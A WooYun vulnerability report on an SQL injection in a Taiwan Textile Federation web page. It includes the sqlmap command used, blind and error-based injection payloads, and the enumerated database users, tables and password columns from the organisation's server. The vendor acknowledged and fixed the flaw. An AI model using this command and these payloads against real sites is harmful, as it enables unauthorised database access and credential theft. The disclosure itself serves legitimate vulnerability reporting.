当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156824

漏洞标题:紡拓會全球資訊網某處存在SQL註射漏洞(346W iis日誌+2W備份文件)(臺灣地區)

相关厂商:紡拓會全球資訊網

漏洞作者: 路人甲

提交时间:2015-12-01 11:29

修复时间:2016-01-07 18:44

公开时间:2016-01-07 18:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态: 已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-02: 厂商已经确认,细节仅向厂商公开
2015-12-12: 细节向核心白帽子及相关领域专家公开
2015-12-22: 细节向普通白帽子公开
2016-01-01: 细节向实习白帽子公开
2016-01-07: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

紡拓會全球資訊網某處存在SQL註射漏洞(346W iis日誌+2W備份文件)

详细说明:

地址:http://**.**.**.**/Textile/io_er/asp_ch/exporter_b.asp?theAction=getDetail&sCatg=391&cty=ALL&ctyNam

$ python sqlmap.py -u "http://**.**.**.**/Textile/io_er/asp_ch/exporter_b.asp?theAction=getDetail&sCatg=391&cty=ALL&ctyNam" -p sCatg --technique=BE --random-agent --batch  --current-user --is-dba --users --passwords --count


Database: TextileDb
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.iislog                           | 3463661 |


Database: msdb
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.backupfile                       | 27741   |

漏洞证明:

---
Parameter: sCatg (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: theAction=getDetail&sCatg=391' AND 2370=2370 AND 'CDSx'='CDSx&cty=ALL&ctyNam
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: theAction=getDetail&sCatg=391' AND 2287=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(113)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2287=2287) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(113))) AND 'LLiK'='LLiK&cty=ALL&ctyNam
---
web server operating system: Windows 2000
web application technology: ASP.NET, ASP, Microsoft IIS 5.0
back-end DBMS: Microsoft SQL Server 2000
current user:    'xUser'
current user is DBA:    False
database management system users [19]:
[*] actuser
[*] adview
[*] adweb
[*] BUILTIN\\Administrators
[*] cchuser
[*] esAdmin
[*] esuser
[*] mkplsuser
[*] n837
[*] netuser
[*] newsuser
[*] qmaint
[*] rptuser
[*] sa
[*] ttfAso
[*] TTFWEBSERVER\\ntsetup
[*] webAdmin
[*] webuser
[*] xuser
Database: TextileDb
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.iislog                           | 3463661 |
| dbo.Evk2112                          | 1491744 |
| dbo.LoginTimes                       | 1411206 |
| dbo.I_statistics                     | 74852   |
| dbo.O_statistics                     | 70600   |
| dbo.GetInfoRec                       | 66059   |
| dbo.mkpls_usage                      | 50029   |
| dbo.Info2005                         | 30773   |
| dbo.Info98                           | 19264   |
| dbo.Info98New                        | 19220   |
| dbo.Info2005_0225                    | 18895   |
| dbo.info2005_050225_BK               | 18895   |
| dbo.Bano                             | 14121   |
| dbo.ttfNews                          | 12144   |
| dbo.marketplace                      | 8131    |
| dbo.BANOtmp                          | 6971    |
| dbo.es_price_inquirybk               | 5376    |
| dbo.TTFNews_041028_BK                | 5246    |
| dbo.ttfNews_2                        | 4963    |
| dbo.es_pro                           | 4444    |
| dbo.mp_user                          | 3419    |
| dbo.es_price_inquiry                 | 1532    |
| dbo.NC_news_tmp                      | 1437    |
| dbo.es_price_querier                 | 1418    |
| dbo.Es_photo_cat                     | 1063    |
| dbo.NC_news_tmp_041028_BK            | 1034    |
| dbo.ECOMPANY                         | 743     |
| dbo.COMPANY                          | 740     |
| dbo.es                               | 560     |
| **.**.**.**c                              | 388     |
| dbo.sysconstraints                   | 383     |
| dbo.es_category3                     | 319     |
| dbo.TTFreport                        | 318     |
| dbo.NC_pic                           | 312     |
| dbo.InfoMagIndex                     | 294     |
| dbo.CCH0001                          | 285     |
| dbo.Country                          | 283     |
| dbo.es_category2                     | 210     |
| dbo.TTFDiscuss_News                  | 148     |
| dbo.CCH0002                          | 72      |
| dbo.TTFact                           | 71      |
| dbo.COMPANY_tmpSM                    | 37      |
| dbo.ECOMPANYSM                       | 37      |
| dbo.COMPANYSM                        | 36      |
| dbo.ECOMPANY_tmpSM                   | 36      |
| dbo.IISLogScan                       | 36      |
| dbo.ttfNewsTmp                       | 28      |
| dbo.WTOnews                          | 19      |
| dbo.forum                            | 18      |
| dbo.es_category1                     | 13      |
| dbo.syssegments                      | 3       |
| dbo.TTFreportTmp                     | 3       |
+--------------------------------------+---------+
Database: pubs
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.roysched                         | 86      |
| dbo.employee                         | 43      |
| dbo.sysconstraints                   | 34      |
| dbo.titleauthor                      | 25      |
| dbo.titleview                        | 25      |
| dbo.authors                          | 23      |
| dbo.sales                            | 21      |
| dbo.titles                           | 18      |
| dbo.jobs                             | 14      |
| dbo.pub_info                         | 8       |
| dbo.publishers                       | 8       |
| dbo.stores                           | 6       |
| dbo.discounts                        | 3       |
| dbo.syssegments                      | 3       |
+--------------------------------------+---------+
Database: tempdb
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.syssegments                      | 3       |
+--------------------------------------+---------+
Database: master
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| INFORMATION_SCHEMA.PARAMETERS        | 2501    |
| dbo.spt_values                       | 727     |
| INFORMATION_SCHEMA.ROUTINES          | 705     |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 379     |
| INFORMATION_SCHEMA.COLUMNS           | 379     |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE | 295     |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE  | 62      |
| dbo.spt_datatype_info                | 36      |
| INFORMATION_SCHEMA.TABLES            | 34      |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES  | 33      |
| dbo.spt_server_info                  | 29      |
| dbo.spt_provider_types               | 25      |
| INFORMATION_SCHEMA.VIEWS             | 25      |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS   | 17      |
| dbo.spt_datatype_info_ext            | 10      |
| INFORMATION_SCHEMA.SCHEMATA          | 8       |
| dbo.syssegments                      | 3       |
| dbo.spt_monitor                      | 1       |
| dbo.sysconstraints                   | 1       |
+--------------------------------------+---------+
Database: msdb
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.backupfile                       | 27741   |
| dbo.backupset                        | 18582   |
| dbo.backupmediafamily                | 18580   |
| dbo.backupmediaset                   | 18580   |
| dbo.RTblRelships                     | 6910    |
| dbo.RTblIfaceHier                    | 3345    |
| dbo.RTblVersionAdminInfo             | 2328    |
| dbo.RTblVersions                     | 2328    |
| dbo.RTblNamedObj                     | 2191    |
| dbo.RTblIfaceMem                     | 1186    |
| dbo.RTblPropDefs                     | 794     |
| dbo.RTblClassDefs                    | 537     |
| dbo.RTblIfaceDefs                    | 452     |
| dbo.RTblProps                        | 392     |
| dbo.RTblRelColDefs                   | 320     |
| dbo.RTblRelshipDefs                  | 144     |
| dbo.RTblParameterDef                 | 136     |
| dbo.sysconstraints                   | 99      |
| dbo.RTblSites                        | 38      |
| dbo.RTblRelshipProps                 | 28      |
| dbo.syscategories                    | 19      |
| dbo.RTblTypeLibs                     | 16      |
| dbo.syssegments                      | 3       |
| dbo.RTblDatabaseVersion              | 1       |
+--------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: TextileDb
Table: NC_security
[1 column]
+--------+---------+
| Column | Type    |
+--------+---------+
| pass   | varchar |
+--------+---------+
Database: master
Table: sysoledbusers
[1 column]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| rmtpassword | nvarchar |
+-------------+----------+
Database: master
Table: syslogins
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | nvarchar |
+----------+----------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-12-02 15:40

厂商回复:

感謝通報

最新状态:

2016-01-07:已修復